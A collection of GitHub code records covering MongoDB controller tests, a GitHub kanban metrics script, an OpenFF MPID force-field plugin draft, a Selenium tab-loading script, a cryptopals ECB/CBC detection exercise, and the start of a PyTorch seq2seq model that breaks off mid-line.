'lNam': 'Stooge'})\n \n test_field = 'emails'\n test_field_c = 'Email'\n test_values = [{'typ': 'work', '_c': test_field_c, 'address': 'bill@ms.com', 'prim': '1'},\n {'typ': 'home', '_c': test_field_c, 'address': 'steve@apple.com', 'note': 'Deceased'}] \n for test_value in test_values:\n generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n \n doc = db['cnts'].find_one({'_id': sample_doc['_id']})\n \n # should now have correct count\n assert len(doc[test_field]) == len(test_values)\n def post_sample_Prs(self):\n\n db = self.g['db']\n usr = self.g['usr']\n \n generic = controllers.Generic(self.g)\n\n cnts = myyaml.pyObj(self.tests_data_yaml_dir + 'cnts.yaml')\n prs_larry_stooge = cnts['larry_stooge']\n \n response = controllers.Generic(self.g).post(**{'docs': [prs_larry_stooge]})\n assert response['status'] == 200\n sample_doc = response['response']['docs'][0]['doc']\n return db['cnts'].find_one({'_id': sample_doc['_id']})\n \n ## lets create a some sample docs bypassing tmp process.\n #sample_doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'Stooge'})\n \n ## EMAILS\n #test_field = 'emails'\n #test_field_c = 'Email'\n #test_values = [{'typ': 'work', '_c': test_field_c, 'address': 'bill@ms.com', 'prim': '1'},\n #{'typ': 'home', '_c': test_field_c, 'address': 'steve@apple.com', 'note': 'Deceased'}] \n #for test_value in test_values:\n #generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n \n ## TELS\n #test_field = 'tels'\n #test_field_c = 'Tel'\n #test_values = [{'typ': 'work', '_c': test_field_c, 'text': '(123) 456-7890', 'prim': '1'},\n #{'typ': 'home', '_c': test_field_c, 'text': '(890) 123-4567', 'note': 'assistant: Sue'}]\n #for test_value in test_values:\n #generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n \n ## NOTES\n #test_field = 'notes'\n #test_field_c = 'Note'\n #test_values = [{'_c': test_field_c, 'title': 'Dentist Visit', 'note': 'Doctor did cleaning.'},]\n #for test_value in test_values:\n #generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n\n ## NOTES\n #test_field = 'ims'\n #test_field_c = 'Im'\n #test_values = [{'typ': 'personal', '_c': test_field_c, 'protocol': 'skype', 'address': 'fred_flintstone'},]\n #for test_value in test_values:\n #generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n\n \n def test_post_listtype(self):\n '''Passing in doc with OID should clone the doc and save in tmp collection. 
Set isTmp = True.\n        '''\n        db = self.g['db']\n        usr = self.g['usr'] \n        generic = controllers.Generic(self.g)\n\n        # let's create some sample docs bypassing tmp process.\n        sample_doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'Stooge'})\n\n        # now let's pretend to initiate an update of this doc\n        response = generic.post(**{'docs': [sample_doc]})\n        \n        test_field = 'emails'\n        test_field_c = 'Email'\n        test_values = [{'typ': 'work', '_c': test_field_c, 'address': 'bill@ms.com', 'prim': '1'},\n                       {'typ': 'home', '_c': test_field_c, 'address': 'steve@apple.com', 'note': 'Deceased'}]        \n        for test_value in test_values:\n            generic.post_attr(sample_doc, test_field, test_field_c, test_value)        \n        \n        # let's get the tmp doc\n        tmp_doc_id = sample_doc['_id']\n        tmp_doc = db['cnts_tmp'].find_one({'_id': ObjectId(tmp_doc_id)})\n        \n        # should have the correct number of added attr elements\n        assert len(tmp_doc[test_field]) == len(test_values)\n\n        # let's submit changes to original source doc.\n        response = generic.post(**{'docs': [tmp_doc]})\n        doc = response['response']['docs'][0]['doc']\n\n        # original doc should now have updated value\n        assert doc[test_field][0]['address'] == test_values[0]['address']\n        \n        # verify that eIds was correctly added\n        assert doc['eIds'][test_field] == 3\n    def test_put_listtype(self):\n        '''Patch a single element of a listType field on the tmp doc, then submit to the source doc.\n        '''\n\n        # let's create some sample docs bypassing tmp process.\n        sample_doc = self.post_sample_Prs()\n\n        db = self.g['db']\n        usr = self.g['usr'] \n        generic = controllers.Generic(self.g)\n\n        test_field = 'emails'\n        test_field_c = 'Email'\n        test_values = sample_doc['emails']        \n        \n        sample_doc_id = sample_doc['_id']\n\n        # when we need to edit most docs, we lock the doc and clone a tmp doc to work on.\n        # now let's pretend to initiate an update of this doc\n        response = generic.post(**{'docs': [sample_doc]})\n        \n        # this is the temp doc, the original is locked\n        doc_tmp = response['response']['docs'][0]['doc']\n\n        test_value = [{\n            \"_c\" : \"Email\",\n            \"eId\" : 2,\n            \"address\": \"fred@apple.com\",\n            \"typ\" : \"home\",\n            \"w\" : 0.0\n        }]\n        test_eId = 2\n        test_elemOffset = 1\n        data = {\n            \"_c\" : sample_doc['_c'],\n            'where': {'_id': sample_doc['_id'], test_field + '.eId': test_eId},\n            'patch': {\n                test_field: test_value,\n            },\n            \"eId\" : 2\n        }\n        \n        # submit patch to tmp doc\n        response = generic.put(**{'data': data})\n        tmp_doc = response['response']['doc']\n        \n        # let's submit changes to original source doc.\n        response = generic.post(**{'docs': [tmp_doc]})\n        doc = response['response']['docs'][0]['doc']\n\n        # original doc should now have updated value\n        assert doc[test_field][test_elemOffset]['address'] == test_value[0]['address']\n    def test_put(self):\n        '''Patch a top-level field on the tmp doc via put, then submit to the source doc.\n        '''\n        db = self.g['db']\n        usr = self.g['usr']\n        generic = controllers.Generic(self.g)\n\n        # let's create some sample docs bypassing tmp process.\n        sample_docs = [\n            self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'Stooge'}),\n            self.post_sample({'_c': 'Prs', 'fNam': 'Moe', 'lNam': 'Stooge'}),\n            self.post_sample({'_c': 'Prs', 'fNam': 'Curley', 'lNam': 'Stooge'}),\n        ]\n        \n        # grab a random doc from sample docs\n        sample_doc_offset = randint(0, len(sample_docs) - 1)\n        sample_doc = sample_docs[sample_doc_offset]\n        sample_doc_id = sample_doc['_id']\n\n        # when we need to edit most docs, we lock the doc and clone a tmp doc to work on.\n        # now let's pretend to initiate an update of this doc\n        response = generic.post(**{'docs': [sample_doc]})\n        \n        # this is the temp doc, the original is locked\n        doc_tmp = 
response['response']['docs'][0]['doc']\n\n        test_field = 'fNam'\n        test_value = 'longname'\n        data = {\n            \"_c\" : sample_doc['_c'],\n            'where': {'_id': sample_doc['_id']},\n            'patch': {\n                test_field: test_value,\n                \"rBy\" : ObjectId(usr['OID'])\n            }\n        }\n        \n        response = generic.put(**{'data': data})\n        doc = response['response']['doc']\n        \n        \n        # did it properly update the value?\n        assert doc[test_field] == test_value\n        \n        # let's submit changes to original source doc.\n        response = generic.post(**{'docs': [doc]})\n        doc = response['response']['docs'][0]['doc']\n\n        # original doc should now have updated value\n        assert doc[test_field] == test_value\n    def test_post_new(self):\n        '''Passing in doc with only _c(lass) should initialize a doc and save in tmp collection.\n        '''\n        sample_doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'King', 'suffix': 'Sr'})\n    def test_post_update(self):\n        '''Passing in doc with OID should clone the doc and save in tmp collection. Set isTmp = True.\n        '''\n        db = self.g['db']\n        usr = self.g['usr'] \n        generic = controllers.Generic(self.g)\n        \n        # let's create a sample doc bypassing tmp process.\n        doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'King', 'suffix': 'Sr'})\n\n        # now let's pretend to initiate an update of this doc\n        args = {}\n        sample_doc = doc\n        args['docs'] = [sample_doc]\n        \n        response = generic.post(**args)\n        \n        # let's get the sample source doc that should now have a cloned copy inserted into the tmp collection\n        src_doc_id = doc['_id']\n        src_doc = db['cnts'].find_one({'_id': ObjectId(src_doc_id)})\n        \n        # should be locked\n        assert src_doc['locked']\n        \n        assert response['status'] == 200\n        data = response['response']\n        \n        assert data['total_inserted'] == 1\n        tmp_doc = data['docs'][0]['doc']\n        \n        # _id's should match\n        assert src_doc['_id'] == tmp_doc['_id']\n        \n        # should be flagged as tmp\n        assert tmp_doc['isTmp']\n    def test_post_submit(self):\n        '''Passing in doc with OID and isTmp set will move/clone the tmp doc into the base/primary doc collection and remove the tmp doc.\n        '''\n        db = self.g['db']\n        usr = self.g['usr'] \n        generic = controllers.Generic(self.g)\n\n        # let's create a sample doc bypassing tmp process.\n        doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'King', 'suffix': 'Sr'})\n        \n        # now let's pretend to initiate an update of this doc\n        response = generic.post(**{'docs': [doc]})\n        \n        # let's get the tmp doc\n        src_doc_id = doc['_id']\n        tmp_doc = db['cnts_tmp'].find_one({'_id': ObjectId(src_doc_id)})\n        \n        # UI will handle making changes to specific fields.\n        # Let's make a sample change to the tmp doc.\n        # NOTE: THIS IS A NO-NO.\n        tmp_doc = db['cnts_tmp'].find_and_modify(\n            query = {'_id': tmp_doc['_id']},\n            update = {\"$set\": {'fNam2': 'Wayne'}},\n            new = True\n        )        \n        \n        # Once any updates are made to tmp/clone copy, update original/source doc. 
Then delete the temp doc.\n response = generic.post(**{'docs': [tmp_doc]})\n \n assert response['status'] == 200\n\n # let's get the sample source doc that should now have been updated from the tmp copy\n src_doc = db['cnts'].find_one({'_id': ObjectId(src_doc_id)})\n \n # should not be locked\n assert not src_doc['locked']\n \n # should have the sample change\n assert src_doc['fNam2'] == 'Wayne'\n \n # tmp doc should have been removed\n assert not db['cnts_tmp'].find_one({'_id': ObjectId(src_doc_id)}) \n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"LarryEitel/gsapi","sub_path":"gsapi/tests/controllers/test_generic_mongo.py","file_name":"test_generic_mongo.py","file_ext":"py","file_size_in_byte":12803,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
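The lifecycle those tests exercise (lock the source doc, clone it into `cnts_tmp`, patch the clone, write it back, drop the clone) can be sketched in bare pymongo. The helper names below are hypothetical, written only to make the flow explicit; the collection names come from the tests, and modern pymongo calls stand in for the deprecated `find_and_modify` used above:

```python
# Hypothetical sketch of the lock / clone-to-tmp / submit flow, not gsapi code.
from pymongo import ReturnDocument

def begin_edit(db, doc_id):
    """Lock the source doc in cnts and clone it into cnts_tmp."""
    src = db['cnts'].find_one_and_update(
        {'_id': doc_id}, {'$set': {'locked': True}},
        return_document=ReturnDocument.AFTER)
    tmp = dict(src)
    tmp['isTmp'] = True
    db['cnts_tmp'].replace_one({'_id': doc_id}, tmp, upsert=True)
    return tmp

def submit_edit(db, tmp_doc):
    """Copy the edited tmp doc back over the source and release the lock."""
    doc = {k: v for k, v in tmp_doc.items() if k != 'isTmp'}
    doc['locked'] = False
    db['cnts'].replace_one({'_id': doc['_id']}, doc)
    db['cnts_tmp'].delete_one({'_id': doc['_id']})
```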
+{"seq_id":"31298305169","text":"#!/usr/bin/env python3.6\n\nimport requests\nimport json\nimport sys\nimport os\nfrom functools import reduce\nimport datetime\n\nCYCLE_TIME_COLUMNS = ['To do', 'In progress', 'Review', 'Testing']\n\nclass GithubSearch(object):\n config = {}\n issues = {}\n weeks_date = {}\n githubEvents = None\n\n def __init__(self, config, until_date, githubEvents):\n self.config = config\n self.weeks_date = self.__getLastFourWeeksByDate(until_date)\n self.githubEvents = githubEvents\n\n def __githubRequest(self, endpoint, payload):\n uri = self.config['github']['api_uri'] + endpoint\n headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/vnd.github.symmetra-preview+json',\n 'Authorization': 'token {0}'.format(self.config['github']['api_token'])\n }\n response = requests.get(uri, params=payload, headers=headers)\n return response\n\n def getIssuesFromMonth(self):\n payload = {\n 'q': 'repo:{1} is:issue is:closed closed:>={0}'.format(\n self.weeks_date['last_week3'].strftime('%Y-%m-%d'),\n self.config['github']['repository_path']\n ),\n 'per_page': 100\n }\n response = self.__githubRequest('search/issues', payload)\n\n return response.json()\n\n def __getLastFourWeeksByDate(self, until_date):\n n_of_days_til_sunday = (until_date.weekday() + 1) % 7\n this_week = until_date - datetime.timedelta(days=n_of_days_til_sunday)\n this_week = this_week.replace(hour=0, minute=0, second=0, microsecond=0)\n\n return {\n 'this_week': this_week,\n 'last_week1': this_week - datetime.timedelta(days=7),\n 'last_week2': this_week - datetime.timedelta(days=14),\n 'last_week3': this_week - datetime.timedelta(days=21)\n }\n\n def __getIssuesByLabel(self, filter_label, issues):\n filtered_items = list(filter(\n lambda item: filter_label in [label['name'] for label in item['labels']],\n issues\n ))\n\n return filtered_items\n\n def __getIssuesByAssignee(self, filter_assignee, issues):\n filtered_items = list(filter(\n lambda item: filter_assignee in [assignee['login'] for assignee in item['assignees']],\n issues\n ))\n\n pair_count = reduce(\n lambda count, n_assignees: count + (1 if n_assignees > 1 else 0),\n [len(item['assignees']) for item in filtered_items],\n 0\n )\n\n return {\n 'items': filtered_items,\n 'pair_count': pair_count\n }\n\n def __filterIssuesByDate(self, issue, date):\n closed_date = issue['closed_at']\n closed_date = datetime.datetime.strptime(closed_date[:-10], '%Y-%m-%d')\n\n date_end = date + datetime.timedelta(days=6)\n return closed_date >= date and closed_date <= date_end\n\n def calcCycleTimeAvg(self, issues, cardsCyclesTimes):\n cycleTimeTotal = 0\n leadTimeTotal = 0\n cyclesByColumn = {}\n\n for issue in issues:\n issueCycles = cardsCyclesTimes[issue['id']]\n for cycle in issueCycles:\n if cycle['column'] not in cyclesByColumn:\n cyclesByColumn[cycle['column']] = 0\n cyclesByColumn[cycle['column']] += cycle['duration']\n\n if cycle['column'] in CYCLE_TIME_COLUMNS:\n cycleTimeTotal += cycle['duration']\n\n leadTimeTotal += cycle['duration']\n\n cyclesByColumnAvg = []\n for column, duration in cyclesByColumn.items():\n cyclesByColumnAvg.append({\n 'column': column,\n 'duration': duration / len(issues)\n })\n\n return {\n 'cycle_time_total_avg': cycleTimeTotal / len(issues),\n 'lead_time_total_avg': leadTimeTotal / len(issues),\n 'cycle_by_column_avg': cyclesByColumnAvg\n }\n\n def getResultByWeek(self, since_date):\n filtered_issues = list(filter(\n lambda issue: self.__filterIssuesByDate(issue, since_date),\n self.issues['items']\n ))\n\n 
cyclesTimesAvg = {}\n if filtered_issues:\n cardsCyclesTimes = self.githubEvents.getCardsCyclesTimes(filtered_issues)\n cyclesTimesAvg = self.calcCycleTimeAvg(filtered_issues, cardsCyclesTimes)\n\n result = {\n 'week_date': since_date.strftime('%Y-%m-%d'),\n 'total_tasks': len(filtered_issues),\n 'collaborators': [],\n 'labels': []\n }\n\n data_result = {**result, **cyclesTimesAvg}\n\n for assignee in self.config['collaborators']:\n name = assignee['name']\n if 'company' in assignee.keys():\n company = ' ({0})'.format(assignee['company'])\n name = name + company\n\n response = self.__getIssuesByAssignee(assignee['username'], filtered_issues)\n\n data_result['collaborators'].append({\n 'name': name,\n 'tasks_count': len(response['items']),\n 'pair_count': response['pair_count']\n })\n\n for label in self.config['labels']:\n items = self.__getIssuesByLabel(label, filtered_issues)\n data_result['labels'].append({\n 'label': label,\n 'tasks_count': len(items)\n })\n\n\n return data_result\n","repo_name":"eucleciojosias/git-kanban-cli","sub_path":"python/scripts/githubsearch.py","file_name":"githubsearch.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
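The averaging in `calcCycleTimeAvg` reduces to: sum each column's durations across all issues, then divide every total by the issue count, counting only the configured columns toward cycle time. The same arithmetic on bare data:

```python
# Per-column and cycle-time averages, as in calcCycleTimeAvg above.
CYCLE_TIME_COLUMNS = ['To do', 'In progress', 'Review', 'Testing']

issues_cycles = [
    [{'column': 'To do', 'duration': 2}, {'column': 'Review', 'duration': 1}],
    [{'column': 'To do', 'duration': 4}, {'column': 'Done', 'duration': 3}],
]

totals, cycle_time_total = {}, 0
for cycles in issues_cycles:
    for c in cycles:
        totals[c['column']] = totals.get(c['column'], 0) + c['duration']
        if c['column'] in CYCLE_TIME_COLUMNS:
            cycle_time_total += c['duration']

n = len(issues_cycles)
print({col: d / n for col, d in totals.items()})  # {'To do': 3.0, 'Review': 0.5, 'Done': 1.5}
print(cycle_time_total / n)                       # 3.5 (lead time would also count 'Done')
```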
+{"seq_id":"71206358620","text":"from typing import TYPE_CHECKING, Dict, List, Literal, Optional, Set, Tuple, Union\n\nimport openmm\nfrom openff.interchange import Interchange\nfrom openff.interchange.components.potentials import Potential\nfrom openff.interchange.models import PotentialKey, TopologyKey\nfrom openff.interchange.smirnoff._nonbonded import SMIRNOFFCollection\nfrom openff.models.types import FloatQuantity\nfrom openff.toolkit import Topology\nfrom openff.toolkit.typing.engines.smirnoff.parameters import (\n ParameterAttribute,\n ParameterHandler,\n ParameterType,\n _allow_only,\n unit,\n)\n\nif TYPE_CHECKING:\n from openff.interchange.models import VirtualSiteKey\n\n# https://docs.openforcefield.org/projects/interchange/en/v0.3.0-staging/using/plugins.html\n\n\nclass MultipoleKey(TopologyKey):\n pass\n\n\nclass PolarizabilityKey(TopologyKey):\n pass\n\n\nclass MPIDMultipoleHandler(ParameterHandler):\n \"\"\"\n \n \n \n \n \n \n \n \n \"\"\"\n\n class MPIDMultipole(ParameterType):\n _VALENCE_TYPE = \"Atom\"\n _ELEMENT_NAME = \"Multipole\"\n\n # This is just the charge, which is handled here instead of the NonbondedForce\n c0 = ParameterAttribute(default=None, unit=unit.elementary_charge)\n\n _TAGNAME = \"MPIDMultipole\"\n _INFOTYPE = MPIDMultipole\n\n # https://github.com/andysim/MPIDOpenMMPlugin/blob/43450d73e567772e8892cabf9dde7f6c34913e4e/examples/ethane_water_charge_only/ethane_water.xml#L57\n coulomb14scale = ParameterAttribute(default=1.0, converter=float)\n\n\nclass MPIDPolarizabilityHandler(ParameterHandler):\n class MPIDPolarizability(ParameterType):\n _VALENCE_TYPE = \"Atom\"\n _ELEMENT_NAME = \"Polarizability\"\n\n polarizabilityXX = ParameterAttribute(default=None, unit=unit.nanometer**3)\n polarizabilityYY = ParameterAttribute(default=None, unit=unit.nanometer**3)\n polarizabilityZZ = ParameterAttribute(default=None, unit=unit.nanometer**3)\n\n thole = ParameterAttribute(default=None, unit=unit.dimensionless)\n\n _TAGNAME = \"MPIDPolarizability\"\n _INFOTYPE = MPIDPolarizability\n\n # https://github.com/andysim/MPIDOpenMMPlugin/blob/43450d73e567772e8892cabf9dde7f6c34913e4e/examples/ethane_water_charge_only/ethane_water.xml#L57\n coulomb14scale = ParameterAttribute(default=1.0, converter=float)\n\n\nclass MPIDCollection(SMIRNOFFCollection):\n type: Literal[\"MPID\"] = \"MPID\"\n\n expression: str = \"\"\n\n @classmethod\n def allowed_parameter_handlers(cls):\n return [MPIDMultipoleHandler, MPIDPolarizabilityHandler]\n\n @classmethod\n def supported_parameters(cls):\n return (\n \"smirks\",\n \"id\",\n \"c0\",\n \"polarizabilityXX\",\n \"polarizabilityYY\",\n \"polarizabilityZZ\",\n \"thole\",\n )\n\n def store_potentials(\n self,\n parameter_handler: List[ParameterHandler],\n topology: \"Topology\",\n ) -> None:\n \"\"\"Populate self.key_map with key-val pairs of [TopologyKey, PotentialKey].\"\"\"\n self.key_map: Dict[TopologyKey, PotentialKey] = dict()\n\n # Assume there are two parameter handlers, one for multipole and one for polarizability\n multipole_handler = [\n x for x in parameter_handler if x.TAGNAME == \"MPIDMultipole\"\n ][0]\n polarizability_handler = [\n x for x in parameter_handler if x.TAGNAME == \"MPIDPolarizability\"\n ][0]\n\n # The multipole stores charges, so assume all atoms have a multipole\n multipole_matches = multipole_handler.find_matches(topology)\n\n # not all atoms have polarizbility\n polarizability_handler = polarizability_handler.find_matches(topology)\n\n # WW has custom charges (stored as multipole parameters) using a custom 
model,\n        # which has potentially many smirks-to-charge mappings. By contrast, there are\n        # only polarizability terms on CHON atoms, and (for now) all C have the same\n        # polarizability parameters, all hydrogens, etc. (In the future there may be more,\n        # or more complex SMIRKS patterns.) So need to store the different types of keys,\n        # cannot collapse them.\n        for key, val in multipole_matches.items():\n            topology_key = MultipoleKey(atom_indices=key)\n            potential_key = PotentialKey(\n                id=val.parameter_type.smirks,\n                associated_handler=\"MPIDMultipole\",\n            )\n            self.key_map[topology_key] = potential_key\n\n        for key, val in polarizability_matches.items():\n            topology_key = PolarizabilityKey(atom_indices=key)\n            potential_key = PotentialKey(\n                id=val.parameter_type.smirks,\n                associated_handler=\"MPIDPolarizability\",\n            )\n            self.key_map[topology_key] = potential_key\n\n    def store_potentials(self, parameter_handler: List[ParameterHandler]):\n        multipole_handler = [\n            x for x in parameter_handler if x.TAGNAME == \"MPIDMultipole\"\n        ][0]\n        polarizability_handler = [\n            x for x in parameter_handler if x.TAGNAME == \"MPIDPolarizability\"\n        ][0]\n\n        self.coulomb14scale = parameter_handler[0].coulomb14scale\n\n        for potential_key in self.key_map.values():\n            if potential_key.associated_handler == \"MPIDMultipole\":\n                smirks = potential_key.id\n                parameter = multipole_handler.parameters[smirks]\n\n                self.potentials[potential_key] = Potential(\n                    parameters={\"c0\": parameter.c0}\n                )\n\n            if potential_key.associated_handler == \"MPIDPolarizability\":\n                smirks = potential_key.id\n                parameter = polarizability_handler.parameters[smirks]\n\n                self.potentials[potential_key] = Potential(\n                    parameters={\n                        \"polarizabilityXX\": parameter.polarizabilityXX,\n                        \"polarizabilityYY\": parameter.polarizabilityYY,\n                        \"polarizabilityZZ\": parameter.polarizabilityZZ,\n                        \"thole\": parameter.thole,\n                    }\n                )\n\n    @classmethod\n    def create(\n        cls,\n        parameter_handler: List[ParameterHandler],\n        topology: Topology,\n    ):\n        # Assume the two handlers have the same coulomb14scale\n        handler = cls(\n            coulomb14scale=parameter_handler[0].coulomb14scale,\n        )\n\n        handler.store_matches(parameter_handler=parameter_handler, topology=topology)\n        handler.store_potentials(parameter_handler=parameter_handler)\n\n        return handler\n\n    @classmethod\n    def check_openmm_requirements(cls, combine_nonbonded_forces: bool) -> None:\n        \"\"\"Later, when setting charges to 0, we will assume that there's just one NonbondedForce.\"\"\"\n        assert combine_nonbonded_forces\n\n    def modify_openmm_forces(\n        self,\n        interchange: Interchange,\n        system: openmm.System,\n        add_constrained_forces: bool,\n        constrained_pairs: Set[Tuple[int, ...]],\n        particle_map: Dict[Union[int, \"VirtualSiteKey\"], int],\n    ):\n        # Set the charges on the nonbonded force to be zero\n        nonbonded_force = [\n            force\n            for force in system.getForces()\n            if isinstance(force, openmm.NonbondedForce)\n        ][0]\n\n        for particle_index in range(nonbonded_force.getNumParticles()):\n            _, sigma, epsilon = nonbonded_force.getParticleParameters(particle_index)\n            nonbonded_force.setParticleParameters(\n                particle_index, 0.0 * unit.elementary_charge, sigma, epsilon\n            )\n\n        # Pseudocode from here to end of file!\n        # Create the MPID force\n        mpid_collection = interchange.collections[\"MPID\"]\n\n        mpid_force = openmm.MPIDForce(coulomb14scale=mpid_collection.coulomb14scale)\n        system.addForce(mpid_force)\n\n        # Set the multipole and polarizability parameters on the force\n        for topology_key, potential_key in 
mpid_collection.key_map.items():\n            openff_particle_index = topology_key.atom_indices[0]\n            openmm_particle_index = particle_map[openff_particle_index]\n\n            if isinstance(topology_key, MultipoleKey):\n                multipole: Potential = mpid_collection.potentials[potential_key]\n                # Set multipole on multipole force using OpenMM particle index,\n                # c0 from `multipole.parameters['c0']`\n                mpid_force.addMultipole(...)\n\n            if isinstance(topology_key, PolarizabilityKey):\n                polarizability: Potential = mpid_collection.potentials[potential_key]\n                # Set polarizability on multipole force using OpenMM particle index,\n                # polarizabilityXX, polarizabilityYY, polarizabilityZZ, thole from\n                # `polarizability.parameters['polarizabilityXX']`, etc.\n                mpid_force.addPolarizability(...)\n\n        # Plus whatever other housekeeping needs to happen with the OpenMM forces\n","repo_name":"openforcefield/MPID_plugin","sub_path":"mpid_plugin/nonbonded.py","file_name":"nonbonded.py","file_ext":"py","file_size_in_byte":9455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
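The collection above routes every lookup through two dictionaries: `key_map` takes a topology site to a parameter identity, and `potentials` takes that identity to the actual numbers, so any number of sites can share one parameter record. A plain-dict sketch of that indirection (stand-in tuples and values here, not the real openff-interchange classes):

```python
# Two-level mapping: many topology sites -> one shared parameter record.
key_map = {
    ('Multipole', (0,)): 'smirks:[#1:1]',      # TopologyKey -> PotentialKey
    ('Multipole', (1,)): 'smirks:[#1:1]',      # two H atoms share one parameter
    ('Polarizability', (2,)): 'smirks:[#6:1]',
}

potentials = {
    'smirks:[#1:1]': {'c0': 0.25},             # PotentialKey -> parameters
    'smirks:[#6:1]': {'polarizabilityXX': 1.3e-3, 'thole': 8.0},
}

for topology_key, potential_key in key_map.items():
    kind, atom_indices = topology_key
    print(kind, atom_indices, potentials[potential_key])
```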
+{"seq_id":"72990477019","text":"from selenium import webdriver\nimport time\n\nfrom selenium.webdriver.chrome.service import Service\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--start-maximized\")\noptions.add_argument('--log-level=3')\noptions.binary_location = \"C:\\\\Program Files\\\\BraveSoftware\\\\Brave-Browser\\\\Application\\\\brave.exe\"\npath=Service(\"C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\108.1.46.144\")\ndriver = webdriver.Chrome(service=path,options=options)\n# Open 200 tabs\nfor i in range(200):\n driver.get('https://www.google.com')\n \n# Wait for 10 seconds\ntime.sleep(10)\n\n# Close all tabs and quit the browser\ndriver.quit()\n","repo_name":"u2508/All-Programs","sub_path":"PYTHON/200tabs.py","file_name":"200tabs.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11074204545","text":"import aes\nimport random\nfrom tools import split_blocks\n\n\ndef get_rand_bytes(size=16):\n return bytes([random.randint(0, 255) for _ in range(size)])\n\n\ndef encryption_oracle(inp):\n begin = get_rand_bytes(random.randint(5, 10))\n end = get_rand_bytes(random.randint(5, 10))\n key = get_rand_bytes(16)\n data = begin + inp + end\n if random.randint(0, 1):\n return (aes.encrypt_ecb_aes(data, key), 0)\n else:\n return (aes.cbc_encrypt(data, key, get_rand_bytes(16)), 1)\n\n\ndef main():\n inp = bytes(70)\n data_set = []\n for _ in range(10):\n enc = ''\n data, answer = encryption_oracle(inp)\n reps = len(split_blocks(data, 16)) - len(set(split_blocks(data, 16)))\n if answer == 0:\n enc = 'ECB'\n else:\n enc = 'CBC'\n data_set.append((enc, reps))\n for element in data_set:\n print(element)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"drseilzug/cryptopals","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70772448861","text":"# coding=utf-8\n\"\"\"\n@Author: 李扬名\n@StartTime: 18/11/18\n@FileName: test.py\n@Software: Pycharm\n@LastModify: 18/11/19\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\n\nSOS_TOKEN = 0\nEOS_TOKEN = 1\n\n# 这里是限制输入句子的长度, 且不包含标点符号.\nMAX_LENGTH = 3\n\n\nclass Lang:\n\n def __init__(self, name):\n self._name = name\n self._word2index = {}\n self._index2word = {0: \"SOS\", 1: \"EOS\"}\n self._n_words = 2\n\n def add_sent(self, sent):\n for word in sent.split():\n self.add_word(word)\n\n def add_word(self, word):\n if word not in self._word2index.keys():\n self._word2index[word] = self._n_words\n self._index2word[self._n_words] = word\n self._n_words += 1\n\n def get_index(self, word):\n return self._word2index[word]\n\n def get_word(self, index):\n return self._index2word[index]\n\n def sent2index(self, sent, set_sos, set_eos):\n word_list = sent.strip().split()\n i_list = [self.get_index(word) for word in word_list]\n\n if set_sos:\n i_list.insert(0, SOS_TOKEN)\n if set_eos:\n i_list.append(EOS_TOKEN)\n\n return i_list\n\n def __len__(self):\n return self._n_words\n\n\nclass EncoderRNN(nn.Module):\n\n def __init__(self, input_dim, hidden_dim):\n super(EncoderRNN, self).__init__()\n self._hidden_dim = hidden_dim\n\n self._embedding = nn.Embedding(input_dim, hidden_dim)\n self._gru = nn.GRU(hidden_dim, hidden_dim)\n\n @property\n def hidden_dim(self):\n return self._hidden_dim\n\n def forward(self, input_x, hidden):\n embedded_x = self._embedding(input_x).view(1, 1, -1)\n output_x, hidden_x = self._gru(embedded_x, hidden)\n return output_x, hidden_x\n\n def init_hidden(self):\n return Variable(torch.zeros(1, 1, self._hidden_dim))\n\n\nclass DecoderRNN(nn.Module):\n\n def __init__(self, hidden_dim, output_dim, dropout_p=0.1):\n super(DecoderRNN, self).__init__()\n self._hidden_dim = hidden_dim\n\n self._embedding = nn.Embedding(hidden_dim, output_dim)\n self._gru = nn.GRU(hidden_dim, hidden_dim)\n self._out = nn.Linear(hidden_dim, output_dim)\n self._dropout = nn.Dropout(dropout_p)\n\n def forward(self, input_x, hidden):\n embedded_x = self._embedding(input_x).view(1, 1, -1)\n dropout_x = self._dropout(embedded_x)\n\n relu_x = F.relu(dropout_x)\n gru_x, out_hidden = self._gru(relu_x, hidden)\n out_x = F.softmax(self._out(gru_x[0]))\n return out_x, out_hidden\n\n def init_hidden(self):\n return Variable(torch.zeros(1, 1, self._hidden_dim))\n\n\nclass AttnDecoderRNN(nn.Module):\n\n def __init__(self, hidden_dim, output_dim, dropout_p=0.1):\n super(AttnDecoderRNN, self).__init__()\n self._hidden_dim = hidden_dim\n\n self._embedding = nn.Embedding(output_dim, hidden_dim)\n self._attn = nn.Linear(hidden_dim * 2, MAX_LENGTH + 2)\n self._combine = nn.Linear(hidden_dim * 2, hidden_dim)\n self._dropout = nn.Dropout(dropout_p)\n self._gru = nn.GRU(hidden_dim, hidden_dim)\n self._out = nn.Linear(hidden_dim, output_dim)\n\n def forward(self, input_x, hidden, e_hidden):\n embedded_x = self._embedding(input_x).view(1, 1, -1)\n dropout_x = self._dropout(embedded_x)\n\n attn_weight = F.softmax(\n 